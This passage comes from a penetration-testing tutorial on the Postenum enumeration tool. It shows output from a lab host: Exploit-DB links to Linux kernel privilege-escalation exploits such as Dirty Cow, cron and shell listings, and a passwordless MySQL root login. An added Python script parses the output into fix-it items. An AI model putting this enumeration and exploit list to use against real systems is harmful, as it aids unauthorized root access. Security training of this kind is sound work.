Linux Kernel 3.14.5 (CentOS 7 / RHEL) - https://www.exploit-db.com/exploits/35370
Linux Kernel 3.x (Ubuntu 14.04/Mint 17.3/Fedora 22) https://www.exploit-db.com/exploits/41999
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - https://www.exploit-db.com/exploits/44298
Linux kernel < 4.10.15 Race Condition - https://www.exploit-db.com/exploits/43345
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - https://www.exploit-db.com/exploits/45010
Linux Kernel 2.6.22 < 3.9 Dirty Cow - https://www.exploit-db.com/exploits/40839
Linux Kernel 2.6.22 < 3.9 Dirty Cow (x86-x64) - https://www.exploit-db.com/exploits/40616
The most specific exploits for your kernel 2.6.24
------------------------------------------------------
Nothing extract from exploits, for kernel 2.6.24
[-] APPS and SERVICES
[+] - Check jobs scheduled
[x] Search on cron in /etc:
drwxr-xr-x 2 root root 4096 Jul 5 2018 cron.d
drwxr-xr-x 2 root root 4096 Apr 28 2010 cron.daily
drwxr-xr-x 2 root root 4096 Mar 16 2010 cron.hourly
drwxr-xr-x 2 root root 4096 Apr 28 2010 cron.monthly
drwxr-xr-x 2 root root 4096 Mar 16 2010 cron.weekly
-rw-r--r-- 1 root root 724 Apr 8 2008 crontab
[x] List /etc/cron.d/
-rw-r--r-- 1 root root 507 May 3 2012 php5
-rw-r--r-- 1 root root 1323 Mar 31 2008 postgresql-common
...
[+] - List all available shells
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen
[-] TRYING ACCESS
[+] - Check for some methods for extract creds and get access as root
[x] Connect to MYSQL as root and non-pass:
[/] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license
Server version 5.0.51a-3ubuntu5
Protocol version 10
Connection Localhost via UNIX socket
UNIX socket /var/run/mysqld/mysqld.sock
Uptime: 41 min 2 sec
Threads: 2 Questions: 447 Slow queries: 0 Opens: 420 Flush tables: 1 Open tables: 64 Queries per second avg: 0.182
Be aware, this one can take some time since it runs all the options and gathers a lot of information.
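Once the -a run has been captured to a file, the useful next step on the defensive side is to turn the raw markers into a list of things to fix. The script below is an added example, not part of Postenum or the original article: it parses the marker convention visible in the output above ([-] opens a section, [+] a check, [x] labels a result, [/] flags a positive finding), pulls out host facts such as the current user, the DISTRIB_* values and the kernel version triple, and lists every [/] finding with its section and check as a remediation item (here, the MySQL root account reachable without a password). The marker meanings are inferred from the page's output rather than from Postenum's documentation, and the sample text is a constructed excerpt in that same shape.

```python
"""Parse Postenum-style output into a structured summary for triage (added example)."""
import re
from dataclasses import dataclass, field

# Constructed sample: a trimmed excerpt in the shape of the output Postenum prints.
SAMPLE_OUTPUT = """\
[-] OPERATING SYSTEM
[+] - Check current user and group information
[x] The current user and group information:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] - Check distribution type and version number
[x] The distribution type and version:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"
[+] - Check kernel version
[x] Kernel version and (32-bit/64-bit):
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[-] TRYING ACCESS
[+] - Check for some methods for extract creds and get access as root
[x] Connect to MYSQL as root and non-pass:
[/] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
"""


@dataclass
class Check:
    """One [+] check: its section, the [x] result blocks under it, and any [/] findings."""
    section: str
    name: str
    results: dict = field(default_factory=dict)   # result label -> list of output lines
    findings: list = field(default_factory=list)  # text of lines flagged with [/]


def parse_postenum(text):
    """Group output lines under their [-] section, [+] check and [x] result label.

    Marker semantics are assumed from the output shown on the page.
    """
    checks, section, current, label = [], None, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[-]"):
            section, current, label = line[3:].strip(), None, None
        elif line.startswith("[+]"):
            current = Check(section=section or "UNKNOWN", name=line[3:].lstrip(" -").strip())
            checks.append(current)
            label = None
        elif line.startswith("[x]"):
            if current is not None:
                label = line[3:].strip().rstrip(":")
                current.results[label] = []
        elif line.startswith("[/]"):
            if current is not None:
                current.findings.append(line[3:].strip())
        elif current is not None and label is not None:
            current.results[label].append(line)
    return checks


def host_facts(checks):
    """Extract the identity, distribution and kernel facts from the result lines."""
    facts = {}
    for check in checks:
        for lines in check.results.values():
            for line in lines:
                m = re.match(r"uid=(\d+)\(([\w-]+)\)", line)
                if m:
                    facts["uid"], facts["user"] = int(m.group(1)), m.group(2)
                m = re.match(r'DISTRIB_(\w+)="?([^"]*)"?', line)
                if m:
                    facts["distrib_" + m.group(1).lower()] = m.group(2)
                m = re.match(r"Linux \S+ (\d+\.\d+\.\d+)", line)
                if m:
                    facts["kernel"] = tuple(int(x) for x in m.group(1).split("."))
    return facts


def triage(checks):
    """Return every [/] finding as a remediation item prefixed with its section and check."""
    return [f"{c.section} / {c.name}: {f}" for c in checks for f in c.findings]


if __name__ == "__main__":
    parsed = parse_postenum(SAMPLE_OUTPUT)
    print("facts:", host_facts(parsed))
    for item in triage(parsed):
        print("FIX:", item)
```

Run it against a saved capture of the -a output instead of the constructed sample by reading the file into `parse_postenum`; the `[/]` lines are the ones that deserve a ticket (here, setting a password on the MySQL root account and restricting its access), while the facts dictionary gives the distribution and kernel details a patching review needs.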
Wrapping Up
Today, we learned how to use Postenum, a tool used to gather vital information during the post-exploitation phase. We first compromised the target and transferred the script from our machine. Then, we went over the various options Postenum provides, including gathering network and service information, interesting files, software versions, and other useful data that could ultimately be used for privilege escalation.
Cover image by Vitaly Vlasov/Pexels